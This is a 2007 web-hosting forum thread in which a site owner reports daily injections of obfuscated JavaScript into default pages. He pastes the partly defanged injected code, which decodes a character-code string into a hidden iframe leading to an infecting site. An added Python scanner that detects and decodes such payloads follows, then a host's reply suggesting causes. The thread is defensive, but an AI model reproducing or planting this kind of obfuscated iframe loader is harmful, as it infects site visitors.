catalyst2 community forums  

02-08-2007, 12:14 PM   #1
Registered User
 
Join Date: Jun 2003
Posts: 29
iframe malicious code injection

Seemingly every day one of at least four websites I run on Cat2 servers gets attacked and every file called "index.php" or "default.asp" or any other default name gets injected with code similar to below:
HTML Code:
function Decode(){var temp="",i,c=0,out="";var str="60116!112!58!47!47!!112!100!101!115!105!103!110!111!110!108!105!110!101!46!99!111!109!47!118!105!47!105!110!100!101!120!46!104!116!109!108!34!32!119!105!100!116!104!61!48!32!104!101!59!34!6!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
	//-->											</SCRIPT><SCRIPT LANGUAGE="JavaScript">										<!--										Decode();		//-->
What the code does (I've deleted some stuff out of it so that it will hopefully now be harmless) is insert an iframe into your website which leads to a virus-infecting site.

Now before you tell me that my site has some insecure upload script, two or three of those websites don't even have upload scripts at all, and those that do generally don't upload into the wwwroot / public_html folders so scripts couldn't be executed anyway. I've done some research and found that what is probably happening is that a single insecure upload script on any website on the server is trawling through the server hard drive and adding this bit of code to every default file it finds.

http://www.webmasterworld.com/javascript/3315690.htm

Solution? Upgrade security on the servers... at least find the insecure script that someone is running.
http://www.eukhost.com/forums/showthread.php?t=1305

I'm getting really sick of this. I have written a script in both PHP and ASP to restore backups when a change is detected in one of these files, but I sometimes miss the odd one and a user will complain to me and Google will list the site as infected. It worries me that these sites are being "hacked" on a daily basis, and while currently I can detect and catch the behaviour, it won't take much to change and get me again, and I'm sure many other people out there have this code on their websites without realising it.
__________________
Everyone Makes Mistakes
I Create Disasters
Oliy
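Added example, not part of the original posts: a static scanner for the injection described in post #1, which finds the `!`-delimited character-code string, decodes it without running the script, and reports whether it hides an iframe. The function names, the sample page and the host malware.example.invalid are constructed for illustration.

```python
import re

# A quoted run of decimal character codes, each terminated by '!', as in the
# injected Decode() string. Empty or oversized tokens are tolerated.
PAYLOAD_RE = re.compile(r"""["']((?:\d*!){8,})["']""")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.I,
)

def decode_payload(encoded):
    """Turn '60!105!...' into text without ever executing the script."""
    chars = []
    for tok in encoded.split("!"):
        if tok.isdigit() and int(tok) < 0x110000:
            chars.append(chr(int(tok)))
    return "".join(chars)

def scan(source):
    """Return one finding per encoded payload found in a file's contents."""
    findings = []
    for m in PAYLOAD_RE.finditer(source):
        decoded = decode_payload(m.group(1))
        tags = IFRAME_RE.findall(decoded)
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "iframe": bool(tags),
            "hidden": any(HIDDEN_RE.search(t) for t in tags),
        })
    return findings

def make_sample():
    """Constructed infected page; the host name is a placeholder."""
    tag = ('<iframe src="http://malware.example.invalid/x.html" '
           'width=0 height=0></iframe>')
    enc = "".join(f"{ord(c)}!" for c in tag)
    return ('<html><body>ok</body><SCRIPT LANGUAGE="JavaScript">'
            'function Decode(){var str="%s";}</SCRIPT></html>' % enc)

if __name__ == "__main__":
    for f in scan(make_sample()):
        print(f["offset"], f["iframe"], f["hidden"], f["decoded"])
```

Run over every default file (index.php, default.asp and so on), this catches the encoded payload itself rather than relying only on a change in the file against its backup.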
02-08-2007, 04:30 PM   #2
Bring me your problems :p
 
paulredpath
Join Date: Jan 2003
Location: /dev/ahhhhhhhhh
Posts: 3,537
Oliy,

It may be useful for you to open a ticket so we can investigate this further. If someone was trawling the server overwriting people's index pages we would have had several reports; however, this is the first issue I have been made aware of. Our servers are patched regularly, and we also audit all new servers and test the security with well-known scripts. We have also moved to using PHPsuexec on all Linux servers, which further isolates each user's website from another.

It doesn't have to be an upload script; it could be SQL injection or even a vulnerable mailer script. If you can open a ticket with the exact details we can take a look and see where the issue might lie.